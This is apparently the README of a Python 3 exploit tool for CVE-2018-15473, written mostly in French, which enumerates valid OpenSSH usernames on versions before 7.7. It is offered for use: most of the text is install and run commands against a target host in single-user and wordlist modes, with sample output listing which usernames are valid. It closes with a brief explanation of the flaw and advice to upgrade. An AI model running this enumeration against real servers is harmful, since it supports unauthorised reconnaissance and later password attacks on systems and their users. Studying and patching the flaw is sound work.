
Exploit basé sur Python pour CVE-2018-15473 permettant l'énumération des noms d'utilisateur OpenSSH via un oracle de réponse d'authentification, avec des modes utilisateur unique et liste de mots.
Exploit d'énumération d'utilisateurs SSH (OpenSSH 2.3 < 7.7)
Version modifiée de l'exploit original : https://www.exploit-db.com/exploits/45233
Converti en Python3
Option de liste de mots d'utilisateurs ajoutée
#Install the requirements:
foo@bar:~$ pip3 install -r requirements.txt
#For single username:
foo@bar:~$ ./Exploit.py 192.168.1.20 -u root
[+] root is a valid username
#For multiple username:
foo@bar:~$ ./Exploit.py 192.168.1.20 -w username.txt
[+] root is a valid username
[-] mysql is an invalid username
[-] mike is an invalid username
[-] foo is an invalid username
[-] bar is an invalid username
Valid Users:
root
#For more option:
foo@bar:~$ ./Exploit.py -h
Le système répond différemment aux tentatives d'authentification valides et invalides. Un utilisateur distant peut envoyer des requêtes spécialement conçues pour déterminer les noms d'utilisateurs valides sur le système cible. Ainsi, un utilisateur distant peut déterminer les noms d'utilisateurs valides sur le système cible.
Le serveur OpenSSH doit être mis à niveau vers la version 7.7 ou supérieure.